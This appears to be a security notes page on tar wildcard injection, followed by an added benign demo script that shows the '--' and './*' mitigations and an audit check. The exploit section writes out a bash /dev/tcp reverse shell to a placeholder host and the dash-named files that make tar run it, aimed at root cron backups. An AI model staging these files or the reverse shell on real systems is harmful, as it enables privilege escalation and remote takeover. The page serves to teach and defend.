Linux Vulns

Wildcard Injection

Wildcard Injection abuses shell globbing. When a command line contains an unquoted wildcard (*, ?, [...]), the shell replaces it with the matching filenames before the program runs, and the program cannot tell an expanded filename apart from any other argument. If an attacker can create files in that directory whose names look like command-line options (for example --checkpoint=1), a program such as tar, rsync, or scp parses them as options rather than as files, and options that run external commands turn a routine backup into code execution with the victim's privileges. The victim notices nothing, because the command they typed looks exactly the same as always.

To exploit it, the attacker stages files in a directory where the victim will later run a command on *, commonly a writable directory that a root cron job backs up. Against tar, for example:

echo "bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1" > revshell.sh
echo "" > --checkpoint=1
echo "" > "--checkpoint-action=exec=bash revshell.sh"

When the victim runs a command like tar -cf backup.tar *, the shell expands * into every name in the directory, including the two that start with --, and passes them to tar as ordinary arguments. GNU tar accepts --checkpoint=1 and --checkpoint-action=exec=bash revshell.sh as options wherever they appear in the argument list, so at the first write checkpoint it runs bash revshell.sh, and the reverse shell connects back to the attacker with whatever privileges the victim had (root, in the cron-job case). The defence is to keep expanded names from being parsed as options: end option parsing with -- (tar -cf backup.tar -- *), use a pattern that cannot start with a dash (tar -cf backup.tar ./*), or pass explicit paths instead of a glob.
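The following script is an added example, not code from the original page. It reproduces the tar wildcard injection in a throwaway directory, with a benign payload (a script that creates a marker file) standing in for revshell.sh, and shows both why the glob is dangerous and that -- or ./* stops it. It assumes GNU tar, whose --checkpoint options are GNU extensions; on other tar implementations only the glob-expansion part of the demo applies. The file names payload.sh, notes.txt and checkpoint_fired are chosen for the demo.

```shell
#!/bin/sh
# Added example (not from the original page): tar wildcard injection in a
# scratch directory with a benign payload, plus the "--" mitigation.
# Assumes GNU tar; the checkpoint options are GNU extensions.

# Stage the attacker's files the way the page describes, except that the
# payload only drops a marker file instead of opening a reverse shell.
make_demo_dir() {
  d=$(mktemp -d)
  printf 'touch checkpoint_fired\n' > "$d/payload.sh"    # stands in for revshell.sh
  : > "$d/--checkpoint=1"
  : > "$d/--checkpoint-action=exec=sh payload.sh"
  printf 'innocent data\n' > "$d/notes.txt"              # a file the victim actually meant to back up
  echo "$d"
}

# Expand PATTERN inside DIR exactly as the victim's shell would, and count how
# many of the resulting words start with "-", i.e. will be parsed as options.
count_option_args() {
  dir=$1; pattern=$2
  (
    cd "$dir" || exit 1
    set -- $pattern        # unquoted on purpose: this is the shell's globbing step
    n=0
    for word; do
      case $word in -*) n=$((n + 1)) ;; esac
    done
    echo "$n"
  )
}

# Run tar in a freshly staged directory. MODE is "unsafe" (the page's command)
# or "safe" ("--" ends option parsing). Prints "<fired|clean> <N>": whether the
# checkpoint action executed, and how many archive members have names
# starting with "--" (i.e. were treated as files rather than options).
run_tar_demo() {
  mode=$1
  d=$(make_demo_dir)
  (
    cd "$d" || exit 1
    case $mode in
      unsafe) tar -cf backup.tar * 2>/dev/null || true ;;
      safe)   tar -cf backup.tar -- * 2>/dev/null || true ;;
    esac
    if [ -e checkpoint_fired ]; then state=fired; else state=clean; fi
    members=$(tar -tf backup.tar 2>/dev/null | grep -c -e '^--' || true)
    echo "$state ${members:-0}"
  )
  rm -rf "$d"
}

# Stand-alone demonstration.
d=$(make_demo_dir)
echo "words starting with '-' from '*'  : $(count_option_args "$d" '*')"
echo "words starting with '-' from './*': $(count_option_args "$d" './*')"
rm -rf "$d"
echo "tar -cf backup.tar *    -> $(run_tar_demo unsafe)"
echo "tar -cf backup.tar -- * -> $(run_tar_demo safe)"
```

In the unsafe run the two dash-named files vanish from the archive listing because tar consumed them as options and the marker file appears; in the safe run both are archived as ordinary members and no command executes. The same check (glob the directory, look for words beginning with a dash) is a quick way to audit any cron job or backup script that passes * to a command.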